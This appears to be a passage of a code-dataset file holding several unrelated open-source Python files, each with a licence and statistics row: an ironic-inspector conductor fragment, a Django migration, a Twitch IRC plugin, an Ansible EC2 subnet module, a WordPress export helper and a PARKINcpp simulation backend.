self._zeroconf = None
self._shutting_down.release()
LOG.info('Shut down successfully')
def _periodics_watchdog(self, callable_, activity, spacing, exc_info,
traceback=None):
LOG.exception("The periodic %(callable)s failed with: %(exception)s", {
'exception': ''.join(traceback_mod.format_exception(*exc_info)),
'callable': reflection.get_callable_name(callable_)})
@messaging.expected_exceptions(utils.Error)
def do_introspection(self, context, node_id, token=None,
manage_boot=True):
introspect.introspect(node_id, token=token, manage_boot=manage_boot)
@messaging.expected_exceptions(utils.Error)
def do_abort(self, context, node_id, token=None):
introspect.abort(node_id, token=token)
@messaging.expected_exceptions(utils.Error)
def do_reapply(self, context, node_uuid, token=None, data=None):
if not data:
try:
data = process.get_introspection_data(node_uuid,
processed=False,
get_json=True)
except utils.IntrospectionDataStoreDisabled:
raise utils.Error(_('Inspector is not configured to store '
'introspection data. Set the '
'[processing]store_data configuration '
'option to change this.'))
else:
process.store_introspection_data(node_uuid, data, processed=False)
process.reapply(node_uuid, data=data)
@messaging.expected_exceptions(utils.Error)
def do_continue(self, context, data):
return process.process(data)
def periodic_clean_up(): # pragma: no cover
if node_cache.clean_up():
pxe_filter.driver().sync(ir_utils.get_client())
def sync_with_ironic(conductor):
if (conductor.coordinator is not None
and not conductor.coordinator.is_leader):
LOG.debug('The conductor is not a leader, skipping syncing '
'with ironic')
return
LOG.debug('Syncing with ironic')
ironic = ir_utils.get_client()
# TODO(yuikotakada): pagination
ironic_nodes = ironic.nodes(fields=["uuid"], limit=None)
ironic_node_uuids = {node.id for node in ironic_nodes}
node_cache.delete_nodes_not_in_list(ironic_node_uuids)
def periodic_leader_election(conductor):
if conductor.coordinator is not None:
conductor.coordinator.run_elect_coordinator()
return
| apache-2.0 | 7,348,057,273,560,102,000 | 36.097458 | 79 | 0.615877 | false |
rafaelnsantos/batfinancas | financas/migrations/0002_caixa_transacao.py | 1 | 1399 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2017-05-30 05:35
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('republica', '0001_initial'),
('financas', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Caixa',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('saldo', models.DecimalField(decimal_places=2, max_digits=8)),
('republica', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='republica.Republica')),
],
),
migrations.CreateModel(
name='Transacao',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('valor', models.DecimalField(decimal_places=2, max_digits=6)),
('data', models.DateField(default=django.utils.timezone.now)),
('descricao', models.CharField(max_length=100)),
('caixa', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='transacoes', to='financas.Caixa')),
],
),
]
| mit | -4,478,321,827,652,335,000 | 37.861111 | 138 | 0.596855 | false |
Jakeable/Ralybot | plugins/twitch.py | 1 | 3677 | import re
import html
from ralybot import hook
from ralybot.util import http
twitch_re = re.compile(r'(.*:)//(twitch.tv|www.twitch.tv)(:[0-9]+)?(.*)', re.I)
multitwitch_re = re.compile(r'(.*:)//(www.multitwitch.tv|multitwitch.tv)/(.*)', re.I)
def test_name(s):
valid = set('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_/')
return set(s) <= valid
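# e.g. test_name(u"some_channel/b/12345") -> True (only letters, digits, "_" and "/" pass),
# while any name containing spaces or other punctuation -> False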
def twitch_lookup(location):
locsplit = location.split("/")
if len(locsplit) > 1 and len(locsplit) == 3:
channel = locsplit[0]
_type = locsplit[1] # should be b or c
_id = locsplit[2]
else:
channel = locsplit[0]
_type = None
_id = None
fmt = "{}: {} playing {} ({})" # Title: nickname playing Game (x views)
if _type and _id:
if _type == "b": # I haven't found an API to retrieve broadcast info
soup = http.get_soup("http://twitch.tv/" + location)
title = soup.find('span', {'class': 'real_title js-title'}).text
playing = soup.find('a', {'class': 'game js-game'}).text
views = soup.find('span', {'id': 'views-count'}).text + " view"
views = views + "s" if not views[0:2] == "1 " else views
return html.unescape(fmt.format(title, channel, playing, views))
elif _type == "c":
data = http.get_json("https://api.twitch.tv/kraken/videos/" + _type + _id)
title = data['title']
playing = data['game']
views = str(data['views']) + " view"
views = views + "s" if not views[0:2] == "1 " else views
return html.unescape(fmt.format(title, channel, playing, views))
else:
data = http.get_json("https://api.twitch.tv/kraken/streams?channel=" + channel)
if data["streams"]:
title = data["streams"][0]["channel"]["status"]
playing = data["streams"][0]["game"]
v = data["streams"][0]["viewers"]
viewers = str(title) + " is currently " + "\x033\x02online!\x02\x0f " + str(v) + " viewer" + ("s are currently watching!" if v != 1 else "")
return html.unescape(fmt.format(title, channel, playing, viewers))
else:
try:
data = http.get_json("https://api.twitch.tv/kraken/channels/" + channel)
except Exception:
return "Unable to get channel data. Maybe the channel is on justin.tv instead of twitch.tv?"
title = data['status']
playing = data['game']
viewers = "The streamer is currently \x034\x02offline\x02\x0f. Try again later!"
return html.unescape(fmt.format(title, channel, playing, viewers))
@hook.regex(multitwitch_re)
def multitwitch_url(match):
usernames = match.group(3).split("/")
out = ""
for i in usernames:
if not test_name(i):
print("Not a valid username")
return None
if out == "":
out = twitch_lookup(i)
else:
out = out + " \x02|\x02 " + twitch_lookup(i)
return out
@hook.regex(twitch_re)
def twitch_url(match):
bit = match.group(4).split("#")[0]
location = "/".join(bit.split("/")[1:])
if not test_name(location):
print("Not a valid username")
return None
return twitch_lookup(location)
@hook.command('twitch', 'twitchtv')
def twitch(text):
    """<channel name> -- Retrieves the channel and shows its online/offline status"""
text = text.split("/")[-1]
if test_name(text):
location = text
else:
return "Not a valid channel name."
return twitch_lookup(location).split("(")[-1].split(")")[0].replace("Online now! ", "")
| gpl-3.0 | 7,622,407,225,456,648,000 | 37.705263 | 152 | 0.567038 | false |
atsaki/ansible-modules-extras | cloud/amazon/ec2_vpc_subnet_facts.py | 1 | 3740 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc_subnet_facts
short_description: Gather facts about ec2 VPC subnets in AWS
description:
- Gather facts about ec2 VPC subnets in AWS
version_added: "2.0"
author: "Rob White (@wimnat)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value. See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSubnets.html) for possible filters.
required: false
default: null
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Gather facts about all VPC subnets
- ec2_vpc_subnet_facts:
# Gather facts about a particular VPC subnet using ID
- ec2_vpc_subnet_facts:
filters:
subnet-id: subnet-00112233
# Gather facts about any VPC subnet with a tag key Name and value Example
- ec2_vpc_subnet_facts:
filters:
"tag:Name": Example
# Gather facts about any VPC subnet within VPC with ID vpc-abcdef00
- ec2_vpc_subnet_facts:
filters:
vpc-id: vpc-abcdef00
'''
try:
import boto.vpc
from boto.exception import BotoServerError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
def get_subnet_info(subnet):
subnet_info = { 'id': subnet.id,
'availability_zone': subnet.availability_zone,
'available_ip_address_count': subnet.available_ip_address_count,
'cidr_block': subnet.cidr_block,
'default_for_az': subnet.defaultForAz,
'map_public_ip_on_launch': subnet.mapPublicIpOnLaunch,
'state': subnet.state,
'tags': subnet.tags,
'vpc_id': subnet.vpc_id
}
return subnet_info
def list_ec2_vpc_subnets(connection, module):
filters = module.params.get("filters")
subnet_dict_array = []
try:
all_subnets = connection.get_all_subnets(filters=filters)
except BotoServerError as e:
module.fail_json(msg=e.message)
for subnet in all_subnets:
subnet_dict_array.append(get_subnet_info(subnet))
module.exit_json(subnets=subnet_dict_array)
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters = dict(default=None, type='dict')
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError), e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
list_ec2_vpc_subnets(connection, module)
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 | 8,756,107,837,508,010,000 | 28.92 | 203 | 0.666845 | false |
stelund/bloggagratis_tools | wp_export.py | 1 | 6401 |
import time
import pytz
import datetime
UTC_TIMEZONE = pytz.timezone('UTC')
def format_pubdate(date):
# Mon, 02 Nov 2009 08:39:06 +0000
return date.astimezone(UTC_TIMEZONE).strftime(u'%a, %d %b %Y %H:%M:%S %z')
def format_isodate(date):
# 2009-11-02 09:39:06
return date.strftime(u'%Y-%m-%d %H:%M:%S')
def format_gmtdate(date):
# 2009-11-02 09:39:06
return date.astimezone(UTC_TIMEZONE).strftime(u'%Y-%m-%d %H:%M:%S')
def format_comments(comments):
format = u""" <wp:comment>
<wp:comment_id>%(comment_id)d</wp:comment_id>
<wp:comment_author><![CDATA[%(author)s]]></wp:comment_author>
<wp:comment_author_email>%(author_email)s</wp:comment_author_email>
<wp:comment_author_url>%(url)s</wp:comment_author_url>
<wp:comment_author_IP></wp:comment_author_IP>
<wp:comment_date>%(date)s</wp:comment_date>
<wp:comment_date_gmt>%(gmt_date)s</wp:comment_date_gmt>
<wp:comment_content><![CDATA[%(text)s]]></wp:comment_content>
<wp:comment_approved>1</wp:comment_approved>
<wp:comment_type></wp:comment_type>
<wp:comment_parent>0</wp:comment_parent>
<wp:comment_user_id>%(user_id)d</wp:comment_user_id>
</wp:comment>"""
for c in comments:
c['gmt_date'] = format_gmtdate(c['date'])
c['date'] = format_isodate(c['date'])
c['user_id'] = 0
c['author_email'] = ''
return u'\n'.join([format % comment for comment in comments])
def format_images(images, static_url):
format = u""" <item>
<title>%(name)s</title>
<link>%(url)s</link>
<pubDate>%(pubdate)s</pubDate>
<dc:creator><![CDATA[admin]]></dc:creator>
%(categories)s
<content:encoded><![CDATA[]]></content:encoded>
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:post_id>%(post_id)d</wp:post_id>
<wp:post_parent>%(post_parent)d</wp:post_parent>
<wp:attachment_url>%(url)s</wp:attachment_url>
<wp:post_type>attachment</wp:post_type>
<wp:post_date>%(post_date)s</wp:post_date>
<wp:post_date_gmt>%(post_gmt_date)s</wp:post_date_gmt>
</item>"""
for img in images:
img['post_name'] = nicename(img['name'])
img['pubdate'] = format_pubdate(img['date'])
img['post_date'] = format_isodate(img['date'])
img['post_gmt_date'] = format_gmtdate(img['date'])
img['categories'] = format_post_categories(img['categories'])
img['static_url'] = static_url
return u'\n'.join([format % img for img in images])
def format_items(items, site_url, static_url):
format = u""" <item>
<title>%(title)s</title>
<link>%(site_url)s/%(year)d/%(month)d/%(day)d/%(post_name)s/</link>
<pubDate>%(pubdate)s</pubDate>
<dc:creator><![CDATA[%(author)s]]></dc:creator>
%(categories)s
<description>%(description)s</description>
<guid isPermaLink="false">%(site_url)s/?p=%(post_id)d</guid>
<content:encoded><![CDATA[%(text)s]]></content:encoded>
<wp:post_id>%(post_id)d</wp:post_id>
<wp:post_date>%(post_date)s</wp:post_date>
<wp:post_date_gmt>%(post_gmt_date)s</wp:post_date_gmt>
<wp:comment_status>open</wp:comment_status>
<wp:ping_status>open</wp:ping_status>
<wp:post_name>%(post_name)s</wp:post_name>
<wp:status>publish</wp:status>
<wp:post_type>post</wp:post_type>
<wp:menu_order>0</wp:menu_order>
<wp:post_type>post</wp:post_type>
%(comments)s
</item>
%(images)s
"""
"""
<excerpt:encoded><![CDATA[]]></excerpt:encoded>
<wp:menu_order>0</wp:menu_order>
<wp:post_password></wp:post_password>
<wp:postmeta>
<wp:meta_key>_edit_lock</wp:meta_key>
<wp:meta_value>1257151148</wp:meta_value>
</wp:postmeta>
<wp:postmeta>
<wp:meta_key>_edit_last</wp:meta_key>
<wp:meta_value>1</wp:meta_value>
</wp:postmeta>"""
for item in items:
item['pubdate'] = format_pubdate(item['date'])
item['post_date'] = format_isodate(item['date'])
item['post_gmt_date'] = format_gmtdate(item['date'])
item['post_name'] = nicename(item['title'])
item['comments'] = format_comments(item['comments'])
item['categories'] = format_post_categories(item['categories'])
item['site_url'] = site_url
item['year'] = item['date'].year
item['month'] = item['date'].month
item['day'] = item['date'].day
item['description'] = ''
item['text'] = item['text'].replace(u'</p>', u'</p>\n')
item['images'] = format_images(item['images'], static_url)
return u'\n'.join([format % item for item in items])
def nicename(s):
translatetable = {
u'\xe4' : u'a',
u'\xe5' : u'a',
u'\xf6' : u'o',
u'\xc4' : u'A',
u'\xc5' : u'A',
u'\xd6' : u'O',
u' ' : u'_',
u'!' : u'',
u'?' : u'',
u':' : u'',
}
x = ''.join([translatetable.get(c, c) for c in s])
return x.lower()
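# Example of the mapping above (assuming Swedish input): nicename(u'Hej Världen!') == u'hej_varlden'
# (å/ä map to a, ö to o, spaces become "_", the characters !, ? and : are dropped, the result is
# lowercased; anything not in the table passes through unchanged)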
def format_post_categories(categories):
cat_dicts = [{
u'nicename':nicename(c),
u'fullname':c} for c in categories]
format = u' <category><![CDATA[%(fullname)s]]></category>\n <category domain="category" nicename="%(nicename)s"><![CDATA[%(fullname)s]]></category>'
return u'\n'.join([format % cat for cat in cat_dicts])
def format_categories(categories):
cat_dicts = [{
u'nicename':nicename(c),
u'fullname':c} for c in categories]
format = u' <wp:category><wp:category_nicename>%(nicename)s</wp:category_nicename><wp:category_parent></wp:category_parent><wp:cat_name><![CDATA[%(fullname)s]]></wp:cat_name></wp:category>'
return u'\n'.join([format % cat for cat in cat_dicts])
def export(articles, categories, bloginfo, outfile):
fp = file(u'wp_template.xml', 'r')
template = unicode(fp.read())
fp.close()
bloginfo['pubdate'] = format_pubdate(UTC_TIMEZONE.localize(datetime.datetime.utcnow()))
bloginfo['creation_date'] = time.strftime('%Y-%m-%d %H:%M')
bloginfo['categories'] = format_categories(categories)
bloginfo['items'] = format_items(articles, bloginfo['site_url'], bloginfo['static_url'])
out = template % bloginfo
if outfile:
fp = file(outfile, 'w')
fp.write(out.encode('utf-8'))
fp.close()
| bsd-3-clause | -5,936,456,404,222,159,000 | 35.369318 | 196 | 0.582253 | false |
gabrielmueller/aljebra-topo | src/backend_parkincpp/parkincppbackend.py | 1 | 53170 | from collections import OrderedDict
import logging
import math, time, sys
import libsbml
from basics.logging.stdoutwrapper import StdOutWrapper
import backend
from backend.basebackend import BaseBackend
from backend.exceptions import InitError
from backend import settingsandvalues
import datamanagement.entitydata
from datamanagement.dataset import DataSet
from datamanagement.entitydata import EntityData
from odehandling.odemanager import ODEManager
from odehandling.odewrapper import ODEWrapper
from sbml_model.sbml_entities import SBMLEntity
import services
from services.dataservice import DataService
from services.optionsservice import OptionsService
from parkincpp.parkin import ValueList, StringList, ExpressionMap, ExprTypeMap, BioSystem, Expression, Param, Vector, BioProcessor, Matrix, QRconDecomp, IOpt, MeasurementPoint, MeasurementList
from parkincpp.parkin import MakeCppOStream
TASK_PARAMETER_IDENTIFICATION = "task_parameter_identification"
TASK_SENSITIVITY_OVERVIEW = "task_sensitivity_overview"
TASK_SENSITIVITIES_DETAILS = "task_sensitivites_details"
class ParkinCppBackend(BaseBackend):
"""
This class uses the SWIG-wrapped PARKINcpp library to do computations.
It is used to do:
- Simple (forward) integration
        - Compute sensitivities (and subconditions)
- Identify Parameters ("Fit") based on experimental data
- Manage experimental and simulation data
- Invoke plots and result tables
- Manage Parameter Sets
- Manage/Show/Edit Species and Parameter values.
    TODO (big one): Refactor this class and split it up into meaningful functional units. As it is,
it is much too large.
@since: 2010-12-17
"""
__author__ = "Moritz Wade"
__contact__ = "[email protected]"
__copyright__ = "Zuse Institute Berlin 2010"
def __init__(self):
"""
Do parameterless initialization here.
Mostly, set up lots of class variables.
"""
super(ParkinCppBackend, self).__init__()
logging.info("Loading PARKINcpp library interface...")
self.selectedParams = None
self.mainModel = None
self.settings = None
self.odeManager = None
self.bioSystem = None
self.bioProcessor = None
self.rawSimResultVector = None
self.timepoints = None
self.timepointsPruned = None
self.sensitivityTimepoints = None
self.sensitivityTrajectoryMap = None
self.paramToSensitivityMap = OrderedDict()
self.parameterSensitivity = None
self.speciesParameterSensitivity = None
self.paramToEstimateMap = OrderedDict()
# we set lots of variables as class variables because they might otherwise go out of scope (in Python)
# when passed to SWIG-generated interfaces...
self.sensitivityTimepoints = None
self.sensitivityTimepointsVector = None
self.timepointVector = None
self.measurementMapVector = None
self.breakpoints = None
self.eventMap = None
self.paramMap = None
self.paramThresholdMap = None
self.speciesThresholdMap = None
self.iOpt = None
self.optionsService = OptionsService()
self.dataService = DataService()
self.mode = backend.settingsandvalues.MODE_INTEGRATE # default mode
def __del__(self):
self.wait() #blocks this thread until it has finished
def setMode(self, mode):
"""
Sets the main computation mode of the backend:
- C{backend.settingsandvalues.MODE_INTEGRATE}
- C{backend.settingsandvalues.MODE_SENSITIVITIES_OVERVIEW}
- C{backend.settingsandvalues.MODE_SENSITIVITIES_DETAILS}
- C{backend.settingsandvalues.MODE_PARAMETER_ESTIMATION}
Don't set the mode string "by hand". Use the "constants" defined
in backend.settingsandvalues!
@param mode: A mode string
@type mode: str
"""
self.mode = mode
def setSettings(self, settings):
"""
Set the settings dictionary. Keys are from
C{backend.settingsandvalues.SETTING_*}.
@parameter settings: Dictionary with settings
@type settings: {}
"""
self.settings = settings
def setMainModel(self, model):
"""
Set the reference to the main model that is needed
everywhere throughout the class.
@parameter model: Current/active main model
@type model: L{SBMLMainModel}
"""
self.mainModel = model
def setParamsForSensitivity(self, paramMap):
"""
Method to set the parameters (given a dict) for which the sensitivities are to be calculated
from the outside.
"""
self.paramToSensitivityMap = paramMap
def setParamsForEstimation(self, paramMap):
"""
Method to set the parameters (given a dict) for which values are to be identified
from the outside.
"""
self.paramToEstimateMap = paramMap
def setTimepointsForDetailedSensitivities(self, timepoints):
"""
Public method to set the timepoints for which to return
the detailed sensitivities (e.g. subconditions).
Has to be called before computing the detailed sensitivities.
"""
if not timepoints:
self.timepoints = None
return
startTime = self.settings[settingsandvalues.SETTING_STARTTIME]
endTime = self.settings[settingsandvalues.SETTING_ENDTIME]
self.sensitivityTimepoints = []
for timepoint in timepoints:
if startTime < timepoint and timepoint <= endTime:
self.sensitivityTimepoints.append(timepoint)
def initialize(self, mainModel, settings):
"""
Do real initialization given a model and settings.
Before the actual computations are invoked (see self._doSimulation and self._computeSensitivities),
the ODEManager is generated (and filled with data) and given to self._createBioSystem to create
a BioParkinCpp BioSystem instance.
This does not run in a Thread. (self._compute() does)
"""
if mainModel:
self.mainModel = mainModel
if settings:
self.settings = settings
if self.mainModel is None or self.settings is None:
errorMsg = "Can't invoke PARKINcpp library without Model/Settings."
logging.error(errorMsg)
raise InitError(errorMsg)
initStartTime = time.time()
# Create ODEManager and fill with data
self.odeManager = self._createOdeManager()
# create the "bio system" (basically one of the two main PARKINCpp classes for interfacing with BioPARKIN)
self._createBioSystem()
self._createBioProcessor()
initEndTime = time.time()
timeElapsed = initEndTime - initStartTime
logging.info("Initialization of PARKINcpp backend took %s seconds" % round(timeElapsed, 2))
def _compute(self):
"""
Do not call this directly! Call start() instead. This will run as a thread.
Invokes computations. Be sure to have set self.mode to the appropriate mode
(settingsandvalues.MODE_INTEGRATE or one of the sensitivity/parameter estimation modes) first.
"""
if not self.odeManager:
errorMsg = "Can't invoke computation. ODEManager has not been set up."
logging.error(errorMsg)
raise InitError(errorMsg)
computeStartTime = time.time()
# switch to relevant computation mode
if self.mode == settingsandvalues.MODE_INTEGRATE:
self.start_progress_report(False, "Starting Integrator...")
integrationSuccess = self._doSimulation()
if not integrationSuccess:
logging.error("Error while integrating.")
logging.debug("ParkinCppBackend._compute(): Error while integrating.")
self.stop_progress_report("Could not start integrator.")
return
self.stop_progress_report(settingsandvalues.FINISHED_INTEGRATION) # also emits the finished signal
elif self.mode == settingsandvalues.MODE_SENSITIVITIES_OVERVIEW:
self.start_progress_report(False, "Computing Sensitivity Overview...")
computationSuccess = self._computeSensitivityOverview()
if not computationSuccess:
logging.error("Error while computing sensitivity overview.")
logging.debug("ParkinCppBackend._compute(): Computation of sensitivities returned False.")
self.stop_progress_report("Error while computing sensitivities.")
return
self.stop_progress_report(settingsandvalues.FINISHED_SENSITIVITY_OVERVIEW) # also emits the finished signal
elif self.mode == settingsandvalues.MODE_SENSITIVITIES_DETAILS:
self.start_progress_report(False, "Computing Detailed Sensitivities...")
computationSuccess = self._computeSensitivityDetails()
if not computationSuccess:
logging.error("Error while computing detailed sensitivities.")
logging.debug("ParkinCppBackend._compute(): Computation of sensitivities returned False.")
self.stop_progress_report("Error while computing sensitivities.")
return
self.stop_progress_report(settingsandvalues.FINISHED_SENSITIVITY_DETAILS) # also emits the finished signal
elif self.mode == settingsandvalues.MODE_PARAMETER_ESTIMATION:
self.start_progress_report(False, "Identifying Parameters...")
computationSuccess = self._doParameterEstimation()
if not computationSuccess:
logging.error("Error while identifying parameters.")
logging.debug("ParkinCppBackend._compute(): Parameter identification returned False.")
self.stop_progress_report("Error while identifying parameters. (Did you load experimental data?)")
return
self._handleEstimatedParamResults()
self.stop_progress_report(settingsandvalues.FINISHED_PARAMETER_ESTIMATION) # also emits the finished signal
computeEndTime = time.time()
timeElapsed = computeEndTime - computeStartTime
logging.info("Computation took %s seconds" % round(timeElapsed, 2))
def _createOdeManager(self):
"""
Creates the ODEManager, sets all settings, and calls init() on that object so that the ODEManager
calculates a number of metrics for later consumption (e.g. when creating the BioModel).
"""
logging.debug("Creating ODE Manager...")
self.odeManager = ODEManager(self.mainModel)
self.odeManager.startTime = self.settings[settingsandvalues.SETTING_STARTTIME]\
if settingsandvalues.SETTING_STARTTIME in self.settings\
else settingsandvalues.DEFAULT_STARTTIME
self.odeManager.endTime = self.settings[settingsandvalues.SETTING_ENDTIME] if settingsandvalues.SETTING_ENDTIME\
in self.settings else settingsandvalues.DEFAULT_ENDTIME
# 29.08.12 td: debug flag for ODE solver: switched on if debugging active via command line switch
self.odeManager.debugflag = 1 if self.optionsService.getDebug() else 0
self.odeManager.rtol = self.settings[settingsandvalues.SETTING_RTOL] if settingsandvalues.SETTING_RTOL\
in self.settings else settingsandvalues.DEFAULT_RTOL
self.odeManager.atol = self.settings[settingsandvalues.SETTING_ATOL] if settingsandvalues.SETTING_ATOL\
in self.settings else settingsandvalues.DEFAULT_ATOL
self.odeManager.xtol = self.settings[settingsandvalues.SETTING_XTOL] if settingsandvalues.SETTING_XTOL\
in self.settings else settingsandvalues.DEFAULT_XTOL
self.odeManager.init()
return self.odeManager
def _createBioSystem(self):
"""
Uses the ODEManager to create a system of BioParkinCpp Expression objects
(+ other data and information).
"""
if not self.odeManager:
logging.debug("ParkinCppBackend._createBioSystem invoked without ODEManager.")
return None
logging.info("Creating BioSystem...")
parameter = StringList()
expressionMap = ExpressionMap()
typeMap = ExprTypeMap()
self.bioSystem = BioSystem(float(self.odeManager.startTime), float(self.odeManager.endTime))
logging.info("Start time: %s" % self.odeManager.startTime)
logging.info("End time: %s" % self.odeManager.endTime)
rTol = float(self.odeManager.rtol)
aTol = float(self.odeManager.atol)
logging.info("RTOL: %s" % rTol)
logging.info("ATOL: %s" % aTol)
self.bioSystem.setSolverRTol(rTol)
self.bioSystem.setSolverATol(aTol)
flag = int(self.odeManager.debugflag)
self.bioSystem.setSolverDebugFlag(flag)
logging.info("Monitoring of ODE Solver: %d" % flag)
# set names / identifies of parameters
for paramWrapper in self.odeManager.parameterList:
pID = paramWrapper.getCombinedId()
# logging.debug("Putting Parameter %s into BioSystem." % pID)
parameter.push_back(pID)
for compartmentWrapper in self.odeManager.compartmentList: # we handle compartments as if they were parameters
pID = compartmentWrapper.getId()
parameter.push_back(pID)
self.bioSystem.setParameters(parameter)
# set the initial value(s) for ODE system
for speciesWrapper in self.odeManager.speciesList:
try:
value = float(speciesWrapper.getInitialValue())
except : # if initial value is None (it probably will be set by an AssignmentRule)
value = 0
self.bioSystem.setInitialValue(speciesWrapper.getId(), value)
# set expressions for ODE system
# put reactions into the BioSystem (within ExpressionMap)
substitutionMap = ExpressionMap()
# AssignmentRules are replaced directly inside reactions
for assignmentRule in self.odeManager.assignmentRuleList:
substitutionMap[assignmentRule.getId()] = assignmentRule.mathForBioParkinCpp()
# Reactions use replaced AssignmentRules and are themselves used for replacing their IDs in ODEs
for reactionWrapper in self.odeManager.reactionList:
expression = reactionWrapper.mathForBioParkinCpp(idsToReplace=substitutionMap)
if expression:
substitutionMap[reactionWrapper.getId()] = expression
# Params are used with their combined ID: "scope_id"
for paramWrapper in self.odeManager.parameterList:
expression = Expression(paramWrapper.getCombinedId())
substitutionMap[paramWrapper.getId()] = expression
# Finally, ODE Expressions are created using all the above substitutions
for odeWrapper in self.odeManager.odeList:
expression = odeWrapper.mathForBioParkinCpp(idsToReplace=substitutionMap)
expressionMap[odeWrapper.getId()] = expression
if odeWrapper.isDAE():
typeMap[odeWrapper.getId()] = 2
logging.info("DAE with ID %s : 0 = %s" % (odeWrapper.getId(), expression))
else:
# 09.08.12 td: default value for typeMap within PARKINcpp
# typeMap[odeWrapper.getId()] = 1
logging.info("ODE for ID %s = %s" % (odeWrapper.getId(), expression))
self.bioSystem.setODESystem(expressionMap)
self.bioSystem.setODETypes(typeMap)
self._initBioSystemParameters()
self._setBioSystemEvents()
def _initBioSystemParameters(self):
"""
Set initial param values for BioSystem.
"""
for paramWrapper in self.odeManager.parameterList:
pID = paramWrapper.getCombinedId()
initialValue = self.mainModel.getValueFromActiveSet(pID)
self.bioSystem.setParamValue(pID, initialValue)
for compartmentWrapper in self.odeManager.compartmentList: #again, handle compartments as parameters
pID = compartmentWrapper.getId()
initialSize = compartmentWrapper.getSize()
self.bioSystem.setParamValue(pID, initialSize)
def _setBioSystemEvents(self):
"""
Check if the model defines events.
Note: we currently only support ONE format for triggers: eq(time, float) where float is an actual float.
E.g.: eq(time, 10.0)
Note: We currently only support ONE type of assignment. They have to target a SPECIES. The right hand side,
the assignment, is arbitrary and will be converted to a PARKINcpp Expression.
"""
if len(self.mainModel.SbmlEvents) == 0:
logging.info("Model does not have events. No need to set any.")
return
logging.info("Processing SBML Events...")
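        # Illustrative example (assumption, not from the original model files): a trigger
        # accepted below must serialize via libsbml.formulaToString() to the form
        #   eq(time, 10.0)
        # and a supported assignment targets a species, e.g. variable "S1", with an
        # arbitrary right-hand side that is later wrapped into a PARKINcpp Expression.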
        errorMsg = "ParkinCppBackend: The only supported event trigger format is: eq(time, float) where float is an actual float. E.g.: eq(time, 10.0)"
events = OrderedDict()
events[self.settings[
settingsandvalues.SETTING_STARTTIME]] = None # kind of a default breakpoint at 0 that we always jump over
for eventEntity in self.mainModel.SbmlEvents:
try:
sbmlEvent = eventEntity.Item
trigger = sbmlEvent.getTrigger()
# we currently only support ONE format for triggers: eq(time, float) where float is an actual float
triggerMathString = libsbml.formulaToString(trigger.getMath())
                errorMsg += "\nThe current trigger is %s" % triggerMathString
                if not triggerMathString.startswith("eq(time,"):
logging.error(errorMsg)
continue
timeString = triggerMathString.split(",")[1].split(")")[0].strip() # TODO: A RegEx would be nicer
time = float(timeString)
if not self.settings[settingsandvalues.SETTING_STARTTIME] < time < self.settings[settingsandvalues.SETTING_ENDTIME]:
logging.info("Event ID %s at timepoint %s is out of integration interval." % (sbmlEvent.getId(), time))
continue
logging.info("Processed event. ID: %s\tTime: %s" % (sbmlEvent.getId(), time))
numEventAssignments = sbmlEvent.getNumEventAssignments()
if numEventAssignments < 1:
continue
events[time] = []
for i in xrange(numEventAssignments):
eventAssignment = sbmlEvent.getEventAssignment(i)
target = str(eventAssignment.getVariable())
assignmentMath = eventAssignment.getMath()
events[time].append((target, assignmentMath))
# logging.debug("\tTarget: %s\tAssignment: %s" % (target,assignmentMath))
except Exception, e:
logging.error("%s\nException: %s" % (errorMsg, e))
events[self.settings[settingsandvalues.SETTING_ENDTIME]] = None
try:
self.breakpoints = Vector(ValueList(events.keys()))
self.bioSystem.setBreakpoints(self.breakpoints)
for i, (time, assignmentList) in enumerate(events.items()):
if i == 0 or i == len(self.breakpoints) - 1 or not assignmentList:
continue
self.eventMap = self.bioSystem.getEvent(i)
for target, assignment in assignmentList:
wrappedAssignment = ODEWrapper(None, mathNode=assignment, mainModel=self.mainModel)
expressionBioParkinCpp = wrappedAssignment.mathForBioParkinCpp()
self.eventMap[target] = expressionBioParkinCpp
logging.info("Event #%s\tTime: %s\tTarget: %s\tExpression: %s" % (i,time,target,expressionBioParkinCpp))
self.bioSystem.setEvent(i, self.eventMap)
except Exception, e:
logging.error("ParkinCppBackend._setBioSystemEvents(): Error while creating events: %s" % e)
return
def _createBioProcessor(self):
"""
This creates the BioProcessor. The BioProcessor is the means to do
computations on a BioSystem object.
It provides methods for forward integrations, sensitivity calculations, and
parameter identification.
The BioProcessor is the abstraction level between BioPARKIN and actual
internal numerical classes like GaussNewton, Parkin, etc.
"""
self.bioProcessor = BioProcessor(self.bioSystem, self.settings[settingsandvalues.SETTING_IDENTIFICATION_BACKEND])
# 22.08.12 td : need to wrap sys.stdout *first* ; only then the redirected stream can be set to parkin
